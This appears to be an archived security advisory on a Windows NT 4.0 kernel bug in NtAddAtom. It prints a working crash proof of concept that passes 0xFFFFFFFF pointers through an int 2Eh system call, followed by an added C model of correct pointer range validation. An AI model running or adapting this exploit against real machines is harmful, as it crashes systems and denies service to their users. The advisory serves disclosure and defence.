COMMAND

    ntcrash

SYSTEMS AFFECTED

    Win NT 4.0

PROBLEM

    Here's a small program able to crash a Windows NT machine using
    the bug in NtAddAtom. It is just a variation of NTCRASH. Credit goes
    to Costin Raiu.

    Note that the location of memory overwritten by the kernel is
    stored in the "a" array. In this exploit the kernel does a write
    operation to FFFFFFFF - instant crash (at least on my machine).

    /*

	A program to bring the BSOD using the bug in NtAddAtom. Works with
	SP3.  Author: Costin RAIU, <craiu@gecad.ro> Compile with VC++

    */

    void *a[2];

    void main(void){
	 int i;
	 for (i=0;i<2;i++) a[i]=(void*)(0xffffffffL);

	 _asm
	    {
	    mov eax,3
	    mov edx,offset a
	    int 02eh
	    }

    }
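
    The advisory states only that the kernel writes to the address the
    caller places in "a". The following added example (not part of the
    original advisory, and not NT source code) models in user mode the kind
    of address-range validation a system service can apply to
    caller-supplied pointers before writing, including the wrap-around case
    that FFFFFFFF triggers in a naive check. The limit 0x7FFF0000 and all
    function names are assumptions made for illustration.

```c
/* Simplified user-mode model; added example, not NT source code. */
#include <stdint.h>
#include <stdio.h>

/* Assumption: 32-bit x86 layout with a 2 GB user / 2 GB kernel split. */
#define USER_PROBE_LIMIT        0x7FFF0000u  /* assumed first address past user space */
#define STATUS_OK               0
#define STATUS_ACCESS_VIOLATION (-1)

/* Return 1 if [addr, addr+len) lies entirely below the limit.
 * addr+len is never computed, so it cannot wrap for addr = 0xFFFFFFFF. */
static int user_range_ok(uint32_t addr, uint32_t len)
{
    if (addr >= USER_PROBE_LIMIT) return 0;
    return len <= USER_PROBE_LIMIT - addr;
}

/* Naive check, shown for contrast: addr+len wraps modulo 2^32. */
static int naive_range_ok(uint32_t addr, uint32_t len)
{
    return (uint32_t)(addr + len) <= USER_PROBE_LIMIT;
}

/* Hypothetical service entry: args mirrors the advisory's two-element "a"
 * array. Every caller-supplied address is validated before any write. */
static int service_entry_checked(const uint32_t args[2])
{
    for (int i = 0; i < 2; i++)
        if (!user_range_ok(args[i], sizeof(uint32_t)))
            return STATUS_ACCESS_VIOLATION; /* fail the call, touch nothing */
    return STATUS_OK;                       /* a real handler would write here */
}

int main(void)
{
    const uint32_t bad[2]  = { 0xFFFFFFFFu, 0xFFFFFFFFu }; /* values from the advisory */
    const uint32_t good[2] = { 0x00401000u, 0x00402000u }; /* constructed user addresses */
    printf("naive check on 0xFFFFFFFF: %d\n", naive_range_ok(0xFFFFFFFFu, 4));
    printf("checked, advisory values:  %d\n", service_entry_checked(bad));
    printf("checked, user addresses:   %d\n", service_entry_checked(good));
    return 0;
}
```

    The naive form accepts FFFFFFFF because the sum wraps to 3; the
    subtraction form rejects it and fails the call with an error status.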

SOLUTION

    God help us.